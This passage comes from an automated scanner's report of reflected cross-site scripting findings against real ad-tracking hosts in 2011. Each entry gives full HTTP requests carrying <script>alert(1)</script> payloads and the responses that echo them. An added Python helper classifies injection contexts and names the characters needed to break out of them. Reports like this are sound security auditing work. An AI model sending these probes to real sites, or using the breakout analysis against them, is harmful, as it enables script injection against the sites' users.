UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304955323%2E101%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:34 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction581d3<script>alert(1)</script>f2d9ac3c949("");

2.40. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into a double-quoted JavaScript string inside the COMSCORE.beacon({...}) call at the end of the response, which is served as application/x-javascript. The payload b98a4<script>alert(1)</script>65268a8432b was submitted in the c1 parameter. This input was echoed unmodified, appended to the existing value 7, in the application's response.

This proof-of-concept attack demonstrates that HTML markup is echoed unfiltered. In the JavaScript context the <script> tag does not terminate the string literal and is inert; it becomes executable only where the response is rendered as HTML (the response sets no X-Content-Type-Options: nosniff header) or where the same beacon code is inlined into an HTML page, in which case the </script> would close the script element early. The report does not show whether a double quote in the value is escaped, which is what would allow break-out within the JavaScript context itself.

Request

GET /beacon.js?c1=7b98a4<script>alert(1)</script>65268a8432b&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:01 GMT
Date: Mon, 09 May 2011 15:35:01 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7b98a4<script>alert(1)</script>65268a8432b", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.41. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into a double-quoted JavaScript string inside the COMSCORE.beacon({...}) call; the response is served as application/x-javascript. The payload 875cb<script>alert(1)</script>e60512b0d49 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that HTML markup is echoed unfiltered; as with c1 in 2.40, the tag is inert in the JavaScript context and executes only where the response is rendered as HTML or inlined into a page.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=875cb<script>alert(1)</script>e60512b0d49&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:03 GMT
Date: Mon, 09 May 2011 15:35:03 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"875cb<script>alert(1)</script>e60512b0d49", c16:"", r:""});



2.42. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into a double-quoted JavaScript string inside the COMSCORE.beacon({...}) call; the response is served as application/x-javascript. The payload 1f594<script>alert(1)</script>f2857c8a3bb was submitted in the c2 parameter. This input was echoed unmodified, appended to the existing value 5964888, in the application's response.

This proof-of-concept attack demonstrates that HTML markup is echoed unfiltered; as with c1 in 2.40, the tag is inert in the JavaScript context and executes only where the response is rendered as HTML or inlined into a page.

Request

GET /beacon.js?c1=7&c2=59648881f594<script>alert(1)</script>f2857c8a3bb&c3=2&c4=&c5=&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:01 GMT
Date: Mon, 09 May 2011 15:35:01 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"59648881f594<script>alert(1)</script>f2857c8a3bb", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.43. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into a double-quoted JavaScript string inside the COMSCORE.beacon({...}) call; the response is served as application/x-javascript. The payload 6a371<script>alert(1)</script>d37c0203cc4 was submitted in the c3 parameter. This input was echoed unmodified, appended to the existing value 2, in the application's response.

This proof-of-concept attack demonstrates that HTML markup is echoed unfiltered; as with c1 in 2.40, the tag is inert in the JavaScript context and executes only where the response is rendered as HTML or inlined into a page.

Request

GET /beacon.js?c1=7&c2=5964888&c3=26a371<script>alert(1)</script>d37c0203cc4&c4=&c5=&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:02 GMT
Date: Mon, 09 May 2011 15:35:02 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"26a371<script>alert(1)</script>d37c0203cc4", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.44. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into a double-quoted JavaScript string inside the COMSCORE.beacon({...}) call; the response is served as application/x-javascript. The payload 98da8<script>alert(1)</script>ccf069095d5 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that HTML markup is echoed unfiltered; as with c1 in 2.40, the tag is inert in the JavaScript context and executes only where the response is rendered as HTML or inlined into a page.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=98da8<script>alert(1)</script>ccf069095d5&c5=&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:02 GMT
Date: Mon, 09 May 2011 15:35:02 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"98da8<script>alert(1)</script>ccf069095d5", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.45. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into a double-quoted JavaScript string inside the COMSCORE.beacon({...}) call; the response is served as application/x-javascript. The payload 5f82e<script>alert(1)</script>3aa7d9dfcd8 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that HTML markup is echoed unfiltered; as with c1 in 2.40, the tag is inert in the JavaScript context and executes only where the response is rendered as HTML or inlined into a page.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=5f82e<script>alert(1)</script>3aa7d9dfcd8&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:03 GMT
Date: Mon, 09 May 2011 15:35:03 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"5f82e<script>alert(1)</script>3aa7d9dfcd8", c6:"", c10:"", c15:"", c16:"", r:""});



2.46. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into a double-quoted JavaScript string literal (the c6 property of the COMSCORE.beacon call) in a response served as application/x-javascript. The payload 631f9<script>alert(1)</script>452333e2e19 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof of concept shows that the parameter is reflected into JavaScript source without output encoding. As with c5, the echo sits inside a string literal in a script resource, so the <script> tags in this payload do nothing there; execution would require an unencoded double quote or line terminator to end the string, which the report does not test.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=631f9<script>alert(1)</script>452333e2e19&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:03 GMT
Date: Mon, 09 May 2011 15:35:03 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"631f9<script>alert(1)</script>452333e2e19", c10:"", c15:"", c16:"", r:""});

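
The issue-detail text in this report describes several of these reflections as "plain text between tags" although the responses are script resources, and the context decides whether the scanner's HTML payload means anything. The helper below is an added example, not part of the XSS.CX output: it classifies the syntactic context an echoed payload lands in from the response body and its declared Content-Type, and says whether the payload as submitted carries the character needed to leave that context. The sample bodies are constructed by trimming the responses quoted in sections 2.45, 2.47, 2.54 and 2.60; all function names are ours.

```python
# Added example (not part of the XSS.CX report): classify where a reflected
# payload lands, from the response body and its declared Content-Type.
# Samples are constructed by trimming responses quoted in this report.

# name -> (content_type, body, payload)
SAMPLES = {
    "scorecard_c5": (
        "application/x-javascript",
        'COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", '
        'c5:"5f82e<script>alert(1)</script>3aa7d9dfcd8", c6:"", r:""});',
        "5f82e<script>alert(1)</script>3aa7d9dfcd8",
    ),
    "mookie_path2": (
        "text/html",
        '<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader'
        '20f90"><script>alert(1)</script>1920f1c3f9d/ATT/x" target="_top">',
        '20f90"><script>alert(1)</script>1920f1c3f9d',
    ),
    "truste_h": (
        "text/javascript",
        "var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3',"
        "'width':728,'height':90494f6<script>alert(1)</script>1666fb1c095,'ox':20};",
        "494f6<script>alert(1)</script>1666fb1c095",
    ),
    "usatoday_callback": (
        "application/json",
        'commentcount98134<script>alert(1)</script>2d20feb71dc({"articleId": '
        '"46732364.story","commentCount": "137"});',
        "98134<script>alert(1)</script>2d20feb71dc",
    ),
}

# Character a payload must contain to leave each context.
BREAKOUT = {
    "html_text": "<", "html_attr_dq": '"', "html_attr_sq": "'", "html_tag": " ",
    "js_string_dq": '"', "js_string_sq": "'", "js_bare": ";",
}


def _open_js_quote(src):
    """Quote character still open at the end of src, or None. Tracks ' and "
    with backslash escapes; comments, template and regex literals are not
    modelled (a heuristic, sufficient for the responses above)."""
    quote, i = None, 0
    while i < len(src):
        ch = src[i]
        if quote:
            if ch == "\\":
                i += 1              # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
        i += 1
    return quote


def _js_context(src):
    return {'"': "js_string_dq", "'": "js_string_sq"}.get(_open_js_quote(src), "js_bare")


def classify_reflection(body, payload, content_type):
    """Name the syntactic context of the first echo of payload in body."""
    pos = body.find(payload)
    if pos < 0:
        return "not_reflected"
    prefix = body[:pos]
    ct = content_type.split(";")[0].strip().lower()
    if "javascript" in ct or ct.endswith("json"):     # script resource / JSONP
        return _js_context(prefix)
    lt, gt = prefix.rfind("<"), prefix.rfind(">")
    if lt > gt:                                       # inside an unclosed tag
        tag = prefix[lt:]
        if tag.count('"') % 2:
            return "html_attr_dq"
        if tag.count("'") % 2:
            return "html_attr_sq"
        return "html_tag"
    lo = prefix.lower()
    if lo.rfind("<script") > lo.rfind("</script"):    # inside an inline script
        return _js_context(prefix[lo.find(">", lo.rfind("<script")) + 1:])
    return "html_text"


def assess(body, payload, content_type):
    """Return (context, payload_can_execute_as_submitted, breakout_char).
    Bare-JS and tag contexts need a syntactically valid continuation that this
    heuristic does not check, so they report False and are left to a re-test."""
    context = classify_reflection(body, payload, content_type)
    if context == "not_reflected":
        return context, False, None
    need = BREAKOUT[context]
    if context == "html_text":
        ok = "<" in payload
    elif context in ("html_attr_dq", "html_attr_sq"):
        ok = need in payload and "<" in payload.split(need, 1)[1]
    elif context in ("js_string_dq", "js_string_sq"):
        ok = need in payload
    else:
        ok = False
    return context, ok, need


if __name__ == "__main__":
    for name, (ct, body, payload) in SAMPLES.items():
        print(f"{name:18} {assess(body, payload, ct)}")
```

Run against the four samples, only the mookie1 attribute reflection comes back as executable with the payload the scanner used; the two script-resource echoes and the JSONP callback report the character a follow-up probe would need (a double quote, or a syntactically valid JavaScript continuation) rather than a verdict.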


2.47. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f90"><script>alert(1)</script>1920f1c3f9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader20f90"><script>alert(1)</script>1920f1c3f9d/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 393
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader20f90"><script>alert(1)</script>1920f1c3f9d/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada/1779262043/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.48. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25f2a"><script>alert(1)</script>656d0189602 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT25f2a"><script>alert(1)</script>656d0189602/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 392
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT25f2a"><script>alert(1)</script>656d0189602/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada/464140654/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.49. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19e49"><script>alert(1)</script>80037391578 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired19e49"><script>alert(1)</script>80037391578/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 393
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired19e49"><script>alert(1)</script>80037391578/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada/1948118371/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.50. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aee35"><script>alert(1)</script>dbb7e18ef46 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-Legacyaee35"><script>alert(1)</script>dbb7e18ef46/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 393
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-Legacyaee35"><script>alert(1)</script>dbb7e18ef46/All/14a155dda-808a-4648-a03d-f65de2ef0ada/1351597883/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.51. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46703"><script>alert(1)</script>3613c51ffe3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-Legacy/All46703"><script>alert(1)</script>3613c51ffe3/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
